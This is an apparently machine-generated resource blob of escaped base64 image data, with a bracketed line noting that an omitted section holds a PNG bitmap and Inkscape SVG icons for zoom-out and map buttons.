ZgezGaspqfo9/u6/\\\n+yX+uz/2I/yNYQF5\\\nTtlt49sbWGM5W0u5\\\n0RtAVeHKkrLdJr0Q\\\n+IBFewO9sMi5\\x0aM6f\\\n56EeeZrpf8ex3v8h\\\n7VzaDGW5nSZst/6+\\\n2EMb+4u/61P34iI4\\\nFnNJkrRkG5cp2Z77\\\n4mI2V6y0a\\x0a5yIGSw\\\ncv6q40sJFD6dHNLG\\\nwtNRKkVEEL7ZkoPc\\\nq1LnZQoNJ4Rx+GEC\\\nksULUU5+y+143Uim\\\nR6Cj37\\x0a/gl+GUPVA\\\n3HVFRWMUvMmUdT1J\\\nLhXFgbjVvjsS7f43\\\nDe+ghASm4cJ6xi6F\\\nXTwY4Op8YJAJkFKL\\\nLTE\\x0ar7nwHiJ8V0Iq\\\noumTgv6+QDYzt83f\\\n937BW4evLKbfR2hF\\\ndmaO4dLG+2b8Ptab\\\nC+RufKgjwd/+W/8z\\\n\\x0aAK6q+Ml/+a8ol65\\\nhBgPywYv8jT/3pxk\\\nUA27eXOZnfvWrk+e\\\nsrq2HlbgQFO0NePs\\\nNrl+/zv/yl34C\\x0arT\\\nX/6z/+p7z97hV+8p\\\nd+mf/69/0enn4y6J\\\nO/9NVf46e/+us4YH\\\nV1NThWrSzxl/7O/8\\\nHf/St/HWcN\\x0a+aDPX\\\n/uH/wxhDV5pLl/bb\\\nh38m9c3pzxvv/Yqf\\\n/+/+Qusrizzr3/+c\\\n
7RmZ+7fB/WwUW+h+\\\n/1JNyS1\\x0aIps6fhps\\\nn2bULj7G4Mq7wAGL\\\nurG4Tp+qs3nf0PWM\\\neD5YnhbL7W0L/Z3G\\\n6ONirmdrRPUaZbs3\\\nKWQ7\\x0aQWpFNjOLnJ0\\\n7zK/3aEAK9FSKx1H\\\n1cry1Qf6bxuipDBB\\\nUnX6Q0qYRUgcWfbn\\\nRvYOb44oK6inJXCt\\\nI\\x0aU7sFupnhCkO50i\\\nGaaZCcmqZa7494Tj\\\nJE/N7D9OhBbiUJf0\\\nhd4BjnP/P9v20MsG\\\n63L7xfGJuyJHNT\\x0aq\\\nEYGHobXVynXHg1Cx\\\nl6I6jWimTomL7btE\\\nR4FTN7H7LCdoZoaU\\\nYCp7rSFhVFYi/dIG\\\nS7cuFZD6Iii\\x0auxFG\\\ncgdAMM0RtM6eJbnN\\\nUESW4Wbi4r21rMJZ\\\nRFni0kdL83ovcN01\\\nysFgwidJWi3iM2f5\\\ni1nF382P\\x0aWacOiEG\\\nf3j0Gy+hmhp6pYdY\\\nGgVm9x2tJHUhzeia\\\nj6vRxnd1tUgF0mpI\\\n9dumuj+1hYnx/HRe\\\n+239P\\x0alcbULp0GwP\\\nQHmN4Q1UxQOsLkwx\\\nAGNSjD6LxVJ2plmK\\\nKgWu7u+Hq6nhFN14\\\nN7JIGga3o51UYwmN\\\nHT\\x0aNaJGcHyUcYQ3h\\\nqo3YHhtf8LyjsVbQ\\\nP2Jpw/1mVz9lc/d1\\\nQripEM/ZnCDknywT\\\nHZpEZUle9pOPkqQ\\x0a\\\nzTgw4g+YK34Y6Ky+\\\nY/BK/dI5ypsddGnw\\\npgrBIEJMtlGkDn7P\\\nrqrCqn4kT0qa09hh\\\njrMmxDWO3OOA\\x0aba+\\\nTnVogPbt7itJ+hXw\\\nMLxX+t1ExB9C1FuV\\\ngk+HsR2K141jMIZD\\\nkGqfP0Ll69a5fQ2U\\\nJtl0QtepU\\x0agNtD3y\\\ny0QjdThBNQ7L+49E\\\ncu9nswKG5ufp4hG0\\\nFs24bxpgJiGDnLSa\\\nkCSa0YUq108eVW0m\\\nJwknPW\\x0agoXk7GzgJ\\\n23c3qWXFEtlGNc3k\\\niBdG9+XnMes9bGdI\\\ndFskzhJgP+fvTcPk\\\nvS87/s+z/O8Z99z7\\\n+yB\\x0a3cVicRAgCV7i\\\nIZOUSEJyKNuSI8mR\\\nJTtVkayKrMphV+wc\\\nlaqknEpV7FLKsWNV\\\nLCtWnJItFWO5JFsy\\\n\\x0aSdEkTVOUSIgEQYA\\\ngQAAL7H3N3dPnez3\\\nPkz/enmvn6pntmZ3\\\nd7U8VCrM93W+/3dP\\\n9/p7nd3y/YlNT\\x0a9H\\\nYIz0GVA5xCgPL9fN\\\nEgJb6G6BASrcOA3g\\\neHNYe4spIMT4yjwg\\\nDd7fZlgnLUUYX8g6\\\n2jpCenegDP\\x0a4W8Oi\\\nFI6q6tw4bg4W8weQ\\\nz4vvOm2INxkEFJ5/\\\nAmsEEwGAbNRtOkxQ\\\n/rHKIdg6iTBFNBqI\\\nsPwyIck\\x0aWyxRnj62\\\nf8dFBSZJEKUQf7yC\\\nN17GpBlZo7shYDjF\\\nEK9nYoIAb7S0pYvf\\\nhnO7T8tyOk7wJ2t5\\\nH0HP\\x0aAC3rdGnfvIn\\\nuarCQRB0y26IwcTw\\\nfgW1HuSeD3bj7lkU\\\nP3F76PdYoHeBWS3j\\\nVcl6ySC0mXsuMJM1\\\n5\\x0aaFpMYhBG4hZKq7\\\n+T5O+pECLfJ+j87w\\\nJsOIZTC3HKBZwwyK\\\n1Ypew1zOrV12czjd\\\n1hGmqQDAN6H6gw\\x0a2\\\nHXWehBIR+HUCji1I\\\nlZnJAtNzAMgLOJUw\\\ntzhKD6cJr+VRhcMA\\\nzX6WFGau3HlEu7U9\\\nOAO/LBTKh/5\\x0aYL5K\\\npUa5p7du60u0eg1z\\\nuxGcHF2VLDVGo+td\\\nTJLmcsm1It5oOe+j\\\nsSYf7UyzvBwhBP5k\\\nFVn2obmD\\x0aO1mmSW7\\\ndwJs+MbCXetCIpIM\\\n3UQG7olURkzaX8cp\\\nVRp/5AJ988hznzjx\\\nCY2mZz/zpiySLt8i\\\nauRfD\\x0apjR6OUT5Hj\\\npKco8IpcgabXQ3Rg\\\nU+bqmA1YZkbqWDPU\\\nNnGePPfjA/lzhi6f\\\nXvr2bidBzjUs4zpE\\\npS\\x0aOLv++55fVGySI\\\ntyeRoGxmDTNs5C9k\\\nWab9RoZjaVw+nD6Y\\\nYYBvQ/C6gjp8sEG9\\\nJX6uTtSRiCIZpe2\\x0a\\\nFT44CqiCh/S9/MO7\\\nQye/N15Bug5ZM1p1\\\nNzqU8yv56DQ5kI76\\\nhYsXODYM6A89ojZC\\\nuTayY4+NdBTe\\x0aRBW\\\npHJLF5upMuk1zRUi\\\nb6d54m5vbKWtDlnT\\\nz26O8LmzSDLdYIG7\\\ntvLiPG010cplwdBT\\\nKR19hDx7l\\x0a8gAAIA\\\nBJREFUrju/gCy42M\\\nyg2xFJfZnC5CTe9A\\\nn+u5/5CT77la/x5d\\\nffXr1/6+Y1RCYx2q\\\nx6mFsL\\x0aUgq06RA1L\\\nKarsdrm8rxK5fP/1\\\niBdiSp7pPWoNwFoM\\\nXot69qZu0WWJugsR\\\nSiB9CRxYwlZdHDC4\\\nmrp\\x0a02q9arNqtMbE\\\nMaabB3Kb6XxRpnXP\\\npvXwr93DgN4HNtxe\\\nCW4QSEehSiHeRB78\\\n0uU2WaOzQdTiKOBU\\\n\\x0ack37Fdl1gcT0Rj0\\\n2WKGuQ/Z0m60+XEl\\\nb5bmkre6ezSC2Ihi\\\nv4ZWrq5v9Yx/+2F0\\\nfc8iDQ+XMIxv0\\x0a52\\\nUS0anPI5TMxVCEIW\\\ntGmC3GUE2SQZLl5i\\\nI9sZM7y3vpUptgoo\\\nY3XiFdam3ZFb9CFk\\\nU0b97ECRYJ\\x0ax0ahd\\\nHQDe3D8FPHcjXy8N\\\n0owWuNNn+AXP/Uxf\\\nu/ffYW3bs9i2i2k4\\\n+YLcwEjz74fWk0WX\\\nn+Nsffn\\x0au2u9MAsI\\\n1NgEHzp9nCtzi9zq\\\nRMx96xsUajWK55/i\\\nvccnCQoeUa9W/uLN\\\nWbqX1xYLys1T4mPv\\\n+wFO\\x0alQucPTbOH12\\\n4SnfmMmmjhVsq5yn\\\n+OO0FbbMWwO+Qur6\\\nXDAN6nyjPOxDzFOk\\\nonGIBd7yM8j3Seot\\\nk\\x0aobnjiMph4lRCVJ\\\njXwHPLwwyb5rlsoV\\\nTuuFYpoEKfrNndtF\\\nu3sQY37xaVbnLgi5\\\nRcNcoDKTBRuueU\\x0a+\\\n8rjw9ERKK5d
DI/GX\\\n2PIUeROMxnjBQSTJ\\\nzfclkWz7NSFs1MqX\\\nQJJvY03UkQHHjbbf\\\nXGcRRHtmRnk\\x0a4iKF\\\nyakj23Rptc0DY5ZC\\\nr/AyMjrKW3MLzH/v\\\nuzh+kJfrjIZQ8r/8\\\nws/xP/3GbzH2/g/y\\\nw+fP8pUL\\x0al3JfjPE\\\nJfuaD7+Uzf/oio77\\\nHjz55ni8A2dwMHz5\\\n9nKcfO8c//fLXAPj\\\nPf+SHSTPNK50WXk/\\\n7QY6M\\x0a402d4AMnj3\\\nFtqc4Ll27wF3/gXf\\\nzeN2HhpW8Sjtk8s6\\\nLNPdt998PQPrVP/O\\\npgLR2hF8xLBfyJKt\\\nL3\\x0ayFodkoUGNr33K\\\nz5vYp19oAUTZ+h2T\\\nLacjxql9TZZo50r4\\\nHVirDY41RB/ooYq+\\\nHnWIfTAEblKliNx\\x0a\\\nqrnX8EEjejKOK2nN\\\n3ZCegz9WpXL+cYrn\\\nzhOeOr0hmA85BDpN\\\nxAEJDh0FnPFJvNIW\\\nBk59YDKd+3On\\x0aKTJ\\\nwkEVv1bERehm+IHc\\\n9XC9FbTJN1o1oXLl\\\nC843XEfHRcw0zaZr\\\nP7WcZQgg8KREIFr/\\\n3cu5z4bio\\x0aIEQqhQ\\\nDGR3NBqJ/+0LN85c\\\nIlbKOOMzbBT77vXX\\\nzrjQvY5TqLccLtep\\\n2f+8gHkEpxevoYL7\\\n95Ab0w\\x0ah2kscvHqV\\\nU4en0Q4Dk8dG+Pdx\\\nycxns/paomP/uD7u\\\nd2O6GSaWqnEz//QD\\\n2JSQ9Zso7tJXiM/o\\\nsEc\\x0ahjv0vnFLZZhb\\\nGNjxpKtwykW8kTLC\\\nd3J94pl630HooJCO\\\nwhkp5qpJUuYCDY3m\\\nlvK3K45r0Hs91WK+\\\n\\x0aY3fCXDxG5Sn3ldE\\\nS6efpeaFk32Mg+3o\\\nNgbPrllp5LuHIKKK\\\n21qwy3IXfOzozs1h\\\njCGo11NjEvT6d\\x0aA8\\\nEfGSXtdnOp1n2g2w\\\nmq4OEUQ6zvrzo5ro\\\n629hax2x2/cTkXxy\\\nlOTSJro/s6h0Ei4t\\\nyZEfIRUp1o\\x0akp7Uc\\\nuj7dNbJJFtjeo6Ml\\\nr/xUz9GpzfyOP/W9\\\n5l474cxAt6uN1l48\\\n3UKY2O8DPy5H/44k\\\nKszLrTa\\x0a1G9cwq2G\\\nLDSfZNwfAWvRxtDV\\\n+ULy2XNnqJQqeFJS\\\n9V1u3ZojWZFtHkDp\\\n7jAYBvQ+MV6AdNWm\\\nlPGK\\x0azvBOdS3Id4H\\\nSc3uzlnmgc0oFZOB\\\nikpR4ZmmT9ONhkiu\\\n5uciihwq9vCYuBG6\\\n50DN82Nnq0KSarN7\\\nO\\x0abVJ9tyevaMji3p\\\nfSWIgF0nfyXbo9IJ\\\n9h0ZsvB7YL0YWxUd\\\nT4gyePeT8S3bhK2l\\\nqbR+/MLxBqgzM5\\x0ad\\\nQ/P6mAwnk9Qq9FdW\\\nNjXot30rg8ycFCBh\\\n0mzDU2fwpUIV6Iib\\\n8drSXtmFmZmUQWf4\\\nvjkgfcIbYc1\\x0aGaoS\\\noozNm2sX83PWWcY7\\\n3/lOvv6N56HTASw6\\\nS7C9sbbFpUVCJ89E\\\nlCfz5lSv9523WJye\\\nqVEU98p/\\x0aAjzXQfq\\\n5jGukNUmU5JcHA91\\\neKbXZbNNZbpMYw1w\\\n35g+/f2HtZI+Yz8B\\\n2DAP6HpCBt7ojhXx\\\nXKkMP\\x0a4eT/R7AaQ1\\\nbmJG2q89/7br5DVb\\\nkAivR6X8okJW2072\\\nkwB0Dkox8icMgaHX\\\nQrwmQapxjkgg1KbR\\\nB8\\x0a2Ipc8rILbB+oV\\\neDlKcOii8PBBXWdb\\\nv1+uqXCMJgfEe4M5\\\nivoNHlgL0yyNorT7\\\nZA09j41o+MEHSd4\\x0a\\\n4xWMyshaa/Pr0nNQ\\\npQAVeqhSgHAUJk53\\\n1M/QnZjG1WtI36F8\\\n4hTGPWTrWplfDwCk\\\n76LTBGEtL3//\\x0a+zz\\\n33Cd4M11bkAtrmfn\\\n217HAb375G0yXAv7\\\nSh57lXz4PMsu4eP0\\\nmP/7uZ/g3vfv/+LP\\\nP8M8++wWQ\\x0akiDw8d\\\n08a5fUW3TihHx1AF\\\nobBCDTlH9/4RJnT2\\\n0c+xPW5p5SO1jh7o\\\nbyDmcGHYYBfU+ogp\\\n8rkpGn\\x0agISjUIV8p\\\nSyVsxbQVW7qopMEM\\\nnc1fW113lRmkgy30\\\nnP36cYHmn7uB+nmX\\\nfbCU7myUmtdN67tp\\\nbvM\\x0aYMoAOspHydyR\\\nUq6hvIsE5t7Jx1XS\\\n5famDbryXIIT2yu7\\\nDTlEWs0tgznklqEy\\\n6j6wUrjh2DhZFO1L\\\n\\x0arEo6CuV7eXPquu+\\\nNSTJoRWDJVcoCj6w\\\nVgdl99NXEGcsXL+H\\\nXKnhTx/d8Tvsla3X\\\nJoi7Cy/tt3FqJ\\x0a1u\\\nULfEkITk1N8Es/8n\\\nFeu3iJLDV8/cp1hI\\\nFXXvkeANdvX+fFMF\\\n+AmCTiW9dv8+MT4/\\\nz5dz+FkHBr\\x0aaZ56p\\\nwPC8vkXXmKuHWOzf\\\nKzt8lKTy0tNTLeDW\\\nXF+FAKZxPyzf/8n/\\\nNWPfpBX377EYqvD5\\\nX0svNaj\\x0aPI/C2OFZ\\\n2Q4Der8k7Tz13Fvp\\\nWVZsNfNu6qSxpk+u\\\nSgFOMQCd142tzrWC\\\nbbJW35KBi7ImD+p9\\\nOLIN\\x0aCrtu9lKoXGp\\\nRhh5uJSRtdsnukEl\\\nECUyW3kV3ul1VTcq\\\nf0+mJL2Sogpc7STX\\\n2b36Tm1is+Rjny22\\\nx\\x0a5YhQafr4/SNg8o\\\nBi+vC/tsaQtpurIh\\\n8PGsYLKJ59DMg14j\\\ntzc2R9Kg+qYghKoB\\\nvxpqyeSTKw3bxB\\x0at\\\nRygCl7e0FrvLyjF9\\\nQYCcSiiScJo4uXlt\\\ne9trYQMHGzRp/7md\\\n/i1W9fwp0+t3j+6e\\\nRWAX/+3X6B5\\x0a9QLS\\\ncXgdcEtjWGtoX3uT\\\nP0jj1SyDbs6RtNpI\\\nx2FucREhJMJKhJRk\\\nczNI5VC/9Bajz76T\\\nxZ751uzL\\x0a36EwNsZ\\\nv6QyjFMJall5+Mb9\\\nO7gPpKPxyCSoVfro\\\nk+Z3WwV99hgG9T7p\\\nzvYvQ+rmAlSaUO+r\\\nnuhWh\\x0aWxFurYQ2Ca\\\nabbE6p93aPQh5ObU\\\nbHuUvRei9yISROJe\\\n88N3FG
urjFF99ahF\\\nS71tC3fM6og/SdXP\\\nsc\\x0aEEJAKpCun+unW\\\nwcZuLBPrxbpKoTXy\\\n4DEaZ49EWzbwPKg7\\\nviOImZ5gajeIKzVE\\\nNURRLtFZ36OLOrP\\x0a\\\nTjiqL+MLHkgr0PXY\\\nQpHiCZ/O7Zuk7a0z\\\nFutRoZf3o2zTo5U3\\\nqnawSYY3VkGV/DXF\\\nspXn7JkVbfV9\\x0ajur\\\nLpJ0OpZOnMO7BpYp\\\ntd6PORlpvoYo+Tim\\\nkMDWNjiIab3wXYzL\\\n82ijR7AKOFzD/yks\\\nIKXHCIjpO\\x0aMGYGoS\\\nROscjytbfJonxDIp\\\nTCr4ygo4j6rTcIps\\\nYpnJgmnlmkfvkSyh\\\nFMT0/zzsfP83tfex\\\n4TdVGu\\x0aS9JsMv/yi\\\n/lJCZBS4RV3n3AqH\\\nzuGKFcQWpM1lsmSG\\\nL9awxZ6/QmHNE82D\\\nOh9sp9ab7rTytjaV\\\nW/k\\x0ag0Z321hhKYwU\\\ncANv1f87jROiTpes\\\nE6AbW19oTZohAweT\\\n7F5DX0/abuKWC1Qe\\\nPYeJY6zJSw3duXmy\\\n\\x0abowry3kqf587/xU\\\nxHllwwdi8hEHufmZ\\\nSjXAVkrWLlnQU7Yt\\\nvUXz0sX0935C9EdW\\\nX0VFC6/YM3O5P\\x0aHn\\\nU9JtNknQjn3jdjHz\\\njGcQgnJkjbV/LmVM\\\nfNs2JbfN/SRhtvZP\\\ncAo6OEeHYJVcltW9\\\nfLIGftiKy5\\x0a/eJBJ\\\nynLFy+iPI9gtIqsD\\\nt6SVW+RkdDtGN2OU\\\nQUfpxLina5gtEZ34\\\n1yt7c77d+JcB953S\\\ndIWpBJH\\x0ard1vRezK\\\nLZZBSZxSQFb3kd0u\\\noxNVfuYv/zSe5zIX\\\nxSy++TqOH+Rjcnt8\\\nLcrzoFrDAlZK5Ng4\\\nHhvX\\x0aXL/TOJzc4DC\\\ng98FBzMdaaw5tFMJ\\\nYy9jT7+AjP/kkU+e\\\nP0V3ugoDrr13j6//\\\n8q8S35xFSYa0GBNY\\\nY\\x0anKCIyRLaF1s9Ew\\\nmLjtpYC8rzEcrB6g\\\nyTxj0VJwHW4hTyi4\\\n3OMkbPP83kSY/HP3\\\nQCx1F85TNvoZoN\\x0as\\\nm5urmASMJ2IrNvq1\\\nf76n9N1KgWcUpA34\\\nsWaZLmJSRJk4OGOF\\\nvEnasRzy0jy1boTh\\\nnjle9PN+zAS\\x0aTI4S\\\nzSzelUKgjmNkFmOc\\\nQ27Wuhe4HsWJ8bzM\\\nEBaw7Rbtmdub3jvd\\\niWG0nDfa9jF5wnIX\\\n00mRYU9t\\x0azYI3Usr\\\nnv9Oda/g6SWjfnkP\\\nOLxJMj6IKgwvscbO\\\n5/fN24lwO18kzcLq\\\nzdTlCd2IEAqRa7W3\\\naCpPl\\x0a74NXKeUudk\\\nHA3O0l/vdf+QcA+Y\\\n7f9VbdFqG3YfB8vE\\\nJh1xKRX96fvsBBMA\\\nzofWCj/dd4t8UAxi\\\nDE\\x0a/uoz++HiSzP8y\\\ne9fZe6b30C6EuEKT\\\nGSwxuL4gnCshFKS5\\\nswycSvPg/vFkLTeI\\\njg2iRMERLNzpN32\\x0a\\\nqpYyQuAVfNxqSDzf\\\nJGosoVRe186WZnnj\\\nlWtc+c4UThDQuXWL\\\npJE/Nl5YQAUebrVC\\\n8ZGTdK7fIG7U\\x0a8Qr\\\nFDV+sbRECHafEM/U\\\nNN5tWFxMlqGpIcGy\\\nEaGaJ0rHjh9/B+5D\\\njqJDiI6dpXbp4V8d\\\nJ6ss4D8FU\\x0agpUKOT\\\nq+tqsrlQmSiM4W2h\\\ndpo41bLuZbwPbOTW\\\n8m05Dlu9wV3Orawn\\\na9f/dOanWda3OosE\\\nHh2Dh4\\x0ady+ytVMA3\\\nnA+fTT0yYKPcHe/j\\\nibLLbzJ6qZyhVAbr\\\nzeyF/T9E3kNX9aXd\\\nnyPOwuLlI/IZ3QY0\\\nPtg\\x0aJbgNHCGw4vDb\\\ntIQUSCUxxqCzjLEz\\\nk3zyb3yaLMmtTXWi\\\n+cO/+3vo2PDp//HH\\\n8Yo+aZxSHq9w8ZuX\\\n\\x0aef35m8y99F3Kk1W\\\ne/MTTnPvgYyRJRnG\\\nkxOf+0deYe/kVihM\\\n1nvvlj2CMIUs1tWM\\\njvPT517n+6gyL\\x0ar7\\\n3OyFPvYGS6wnt+5C\\\nzaWJSUfOnXn2fpwl\\\nt4pWofL2Lni4Je7h\\\nInmuD4KEYNg/lhY7\\\nz8PVeej8l2\\x0arw1vR\\\n7z8cAT0rVCjE1uKW\\\nZlOApUiwpX7mo9eP\\\n7EiHLWaXdsteNo0o\\\n33tNsVzdx/QC+PjN\\\nK7t31t+\\x0aFVf0XZ/W\\\njS5etYRwHZQfbBuk\\\nS8dPYMMCf6ec8vtt\\\nxXdOn2X57bd2PHbn\\\n0kUKZx/d69kPnGFA\\\n74Pd\\x0aRGP2g9UGk6S\\\n5+9IWuLUiNjMDHes\\\n6/cw473quRuMvnMJ\\\nkhj/93A3mv/0NShM\\\nVHEfx+b/3h+g0Bgt\\\nx\\x0aO8Z1XCrjFT73T1\\\n8hq8+iAp/HP3QSvC\\\nJgac7Weelff4tXv/\\\nQ6wfgY1ZOTeJWR/A\\\nIhYGR6lN/9+98k\\x0au\\\nnmFcHKKs8+MIQpVr\\\nGdZuvAajYse1194j\\\neKJE4w/MoKsjGHMh\\\nV1fh/K9VcejrVh9v\\\n7oJUvWxOBhy\\x0aYBRO\\\nHKd19eq+1NGOssTm\\\nYRGM1ogW78hCZZpk\\\nqZX7LBSDvrvYVxBS\\\n4Y2U8UcqyHCjredO\\\nznGrPuK3\\x0abuJN73+\\\n87WeDjN+mRFCrEtW\\\nX93UMFfj4U1WcchG\\\nTJDv3K7F27vHcMt5\\\nYmXhu691/9fQZTBA\\\nA8D83\\x0aXYQxdG7svv\\\nA4CJ+P/TAM6H1gd6\\\nk17QehJNJ1MOt26C\\\nvGIP6xaj5j2lt9my\\\nxDd3rd8nexuFi42e\\\nDC\\x0ad2ZZut3Nu1xbD\\\nXSW0bi9RHOuwY/+z\\\nU/ytd+9Qv3lF1br+\\\nytl/uWLl5C+4sbYC\\\nKWKpF4OsEnG6DPv\\x0a\\\nQrgeT75/hKnHJrjw\\\n/HVu9p4vakWIpEPz\\\nxk1MlmKfyWtwwgqU\\\n71M7/zSu7/D0D05Q\\\nna7xld96s7++\\x0aAsG\\\na3OUOhBODb+YZsje\\\nMdHCCYF8BXToKVX6\\\n4JxPciWObAjqAjVM\\\nwuZCMzcI9Ne0ms8v\\\n4Y1VkaXPH\\x0aYfHEFO\
[binary resource data omitted: a base64-encoded PNG bitmap followed by two Inkscape SVG icon definitions ("zoom_out.svg" and "map.svg"), the latter embedding a second base64-encoded PNG image; the raw escaped byte stream is not reproducible as text]
sY5jJOkoQXVlE\\\n3LBRap4KBMmXkLDj\\\n9b+KBNmg/gMVR2e2\\\nx5nV9liTdN0fYVcc\\\nDGX7VsIeTRhd8Vi \\\nqFLhnWu6cYOAr20d\\\nZagap2A7rEvHef+a\\\njgPetzlQOaQECfak\\\n3bwRE+UABMaHIp1k\\\nD5lYg2VQRYKS ixh\\\nXDjtB2h8URURZGqW\\\n8KY+ytmlaFOfJgGg\\\nHeOLsk/TrV7Tyn9v\\\nGiYoOPfHaOZpLEkS\\\n35DD6KjP0 SVCLKp\\\n3ZMXfrFGCaRslpVt\\\nEHq0xNuS0EiiA09p\\\nVSFb65s9a65o7dGd\\\n68ajGrWptothyWJK\\\nL8dbxI czyBJgW8b\\\nEU3VdvhwYnitP2lN\\\nIWTmhOUxkd56LEh1\\\np9+BqNbsw1hNUDPk\\\nmbiCY3BiQLHrengL\\\n1v2 GKK6qRqhlHSJ\\\njo4kD93/Z9qSLayU\\\n0zy6s4iX0lm7qIWd\\\nVpGWlhYESTyghrAL\\\nwY5imStXd01zIE9K\\\n Amc1xzirOUZVLSH\\\n0GNw6mOPh8QopXWW\\\ngVKX08D0NkgQQVL1\\\nZjRefkdQYtH2aQ4v\\\nBss9u06NTk0hN tg\\\n7yHBNv7tqGJx1qm4\\\nbvhLiDMyurjzSOka\\\nSjBIFWb2w7feCTSx\\\n7RR/cMCCld4dt9E7\\\nQbGouje7ZV sg5y3\\\nsJcuu/B9miC7Ls4v\\\nk/J8VkeU/mnZW3c1\\\nl+bEF6+eGZ39Jzj8\\\n9PdWdY3GaxL7ztlG\\\ndrBYUk/ yV0R/N3m\\\ngqNJ9dYjx51yBl+9\\\n+Ube/o73ArV02ynP\\\nOHte+5AiMqEdENg+\\\nWkpHao0c9mjNQrRC\\\nxpLY HoH5Ee4FV4f\\\nrBriTEcTZsLNoctX\\\nqdj6+aaihEwoMEas\\\n3TmRrHq9Jw21a+HM\\\nzNXJTT9vNpcXbFwx\\\nJ nGYpsCgeYeNYjo\\\nztcsuZK2lpaub66z\\\n5JU1sLL730NRTdgO\\\n6YwW233IxqGLz00t\\\ncA0B7R0WWJ0A8Y t\\\n2opqr6HN/OHP9zN6\\\nb3rSAiQXt+J2VIjS\\\ndGoziMPP8TtN9/Mx\\\n266id7jW7AmxeaCJ\\\nOI4Hnm3xgr+ 8Ou7\\\nWHX8WlIXvRg1JdFp\\\naEi6xpcvfycvf/3r\\\nOO6UUw8ZSbJcl63F\\\nKilVYdGU4pdmXaOv\\\nbM2Z7tEW x7B3lbk\\\nEHaktxn2KT3/F5aS\\\nTzuC/bvkKACuPW0t\\\ngBYiRmZ9PqVJDQJ9\\\nSJdYeZp3P4YCkCo3\\\nmu08m jpGkoxx1PZ\\\nJoBwSaSEpTOa0lgR\\\nmEDXt6OPq0SPvDaN\\\nVGk0XedUIPn9o0xP\\\nWnLKYnouCEAiXX47\\\nb+ DO86vpOqVyv5H\\\n3N8vrJlmLiqMGj5H\\\nDdkEvgBggdK6/SqM\\\nzdjNyrZDjUURSTQx\\\nAVHk+SEgjtu0/2s \\\nF7HxJz/kPe+pmeKd\\\nuvYMLn3Fq+a1D7FV\\\nw3wki9KkH9IqsEMF\\\nKSYjSrXrc2TdYWqo\\\nV+TtK4J492iR O3Z\\\nnEfayuHPTKk5HFH1\\\nnAW9tesHkZm8Euow\\\n64Sw45WbuNanlbJe\\\noqnBKWuehbIVVkoH\\\nv7glh1CMp 1VIFeb\\\nIFziltKXRZQqy6IM\\\nIyX0aZwlmii+Ksbz\\\nOoCmBXS2iROF1Rg/\\\nTpp3La6hNpUmWiWQ\\\nfPrbuE 20QUDZCRs\\\nw64HrIqoctSoyqtK\\\nWrwuU/8By4hzkF4A\\\nw1VTPwgbBCizbkyV\\\nx7fyUPZCr8angBAF\\\n0V6 4zrPaZ37N1BP\\\nO0Gt4uuMQsA58Shy\\\nS4p1q5bWXg/A2VHC\\\nK7voT3JK6umMYyTp\\\nGAg0CbngNlJuuqIw\\\n tc2oNmgSyuJRpUX\\\naH4YrJs/vSNCtK5y\\\nWjnDfRIUVcY2i49I\\\nZ0Vke0/m3BwfYXKj\\\nwqt4W7hzKc25H kt\\\nc1JWvGiZP8s96LzS\\\n97DWFx4AeHlURoXQ\\\nbVbQtrMyDFZJwJi2\\\nHTwXjuRXzs8n8Bai\\\nmCqai3Bplt khftA\\\nL/qIR+kH9LhhBSXC\\\ncZtOIAIlyiJ84rQb\\\nS87LI9NX9lbO2ssY\\\nK77XvBD+ko2PYbC/\\\n5VMlidm LljMJVHi\\\nOQt9sDpr2m0hCHSp\\\noek5GKQ0hXHTJuvL\\\nZP2AdbKEpOz57ie3\\\nT49Mp1WZkVyBj37k\\\nw9jF MqVqiUtf8y9\\\nc+I8XEWgCgiKhKwo\\\n/uP1H/Pi73yUWS1I\\\nqZLnxS19l6xO7+M5\\\n3buLGm2/hB/f+gsf\\\n+ +jfGJsaxiiVs2+\\\naaG/6DVUt6p1V23X\\\nbLzZTGRvnQxz7B+z\\\n/6Xi656FUsPXF2nc\\\n/+MFCq0qwILEoa 3\\\nJspsziq0RuvWRd0d\\\nyVZn67dk7QiLajRr\\\n5xWkdMq1q4Kwdie8\\\nnhZBHlFHGtX5aAKM\\\no5h3zhGko5i yEW3\\\n5gmiSQTG7KsnueSh\\\nD5SorJl/r6OnG2az\\\nAVjVFOVr20b5w1gR\\\nO4C/ZKuYnkdPLEJc\\\nFtlRcSg6 Lpcta2e\\\n36fLSniYuWdKK2V8\\\nGaAxo5kAF0Qka/iR\\\nSj0HQX5m34eGBQml\\\nSMQcq8/I4unukyGD\\\nV5pWL munaaDKm2z\\\nPIEdS+i2zIjdTc1P\\\nM3+8uEbohv+TOcww\\\n8nFEVkIVO90qItmE\\\nDWsT+ClXN8so5P2Q\\\nuw gxDRDwnGbfyqV\\\n6tg3IfZZlISWN+ks\\\nzqhccmSFq55eACYe\\\ne8qq1NEt+TQFHHBz\\\ntBTIVbcOceEhaJe \\\njTa1we2f7rqL3X19\\\n4NZI9RNbNvOsZz+P\\\npO3zH1+/iRPWrefi\\\n172eXDbDuy/7Zza8\\\n9AK0yUhT6If8 /Lu\\\n38r4PfYze1h48XST\\\nRZCCMDuAQ4gkhnuP\\\nz6CMPc8P/3EpEU/n\\\nvm27kV3f+mBPe9vb\\\nGOdzxnW+x a9sO3n\\\nPdJ3GDAMH3sGICct\\\nFGsd39GkjujZzj8u\\\n7V3XgB/Ha4gBloRO\\\nQ9v4Fu/eB+z/riWq\\\nWmHJMQ 
I/I0/7RjB\\\nOnw4RhJOkohlzyij\\\n+Wormqa0yxRLnlou\\\n8s47dGndY+2/cHXJ\\\nSTTw9vLQO/0tiZOT\\\nhn8 baICFrxpVQdX\\\n/W0Hp6lRSrbHl85d\\\nNs080s3YiIo0zQ9I\\\n7jDwRkzkDqMRgVBW\\\nxKluKyEoAmqzfljI\\\n ktKi4W7bt3KzHhV\\\naJWr8fjjP9blhXpt\\\nO8Z8DGXKO39A8mAO\\\nVmoYqUvdWCRqGi4E\\\nm1nyemtSauaMu Hb\\\nYmvU86kgp+/9xalo\\\ngsUg0C5F0WfsYlUA\\\nTkqILWtf+o4aDl8r\\\nPdOXaWLRRRois6O7\\\nkNDBGnLYI+ UCIwp\\\nDl/2/uD6AY4bfr+N\\\n1wAfMsH38V3HRYvX\\\ncbZZz2TaFib3C3LR\\\ntQV7JjOw49soqmtn\\\nS994qO1 9yoVhrfu\\\nnLavC171Cj7ywfdw\\\n3oYN/MPLLqZZmhlZ\\\nO+HEdUQ0lart0NHe\\\nxcC2PU1iH7jnTzy+\\\n5VG+ 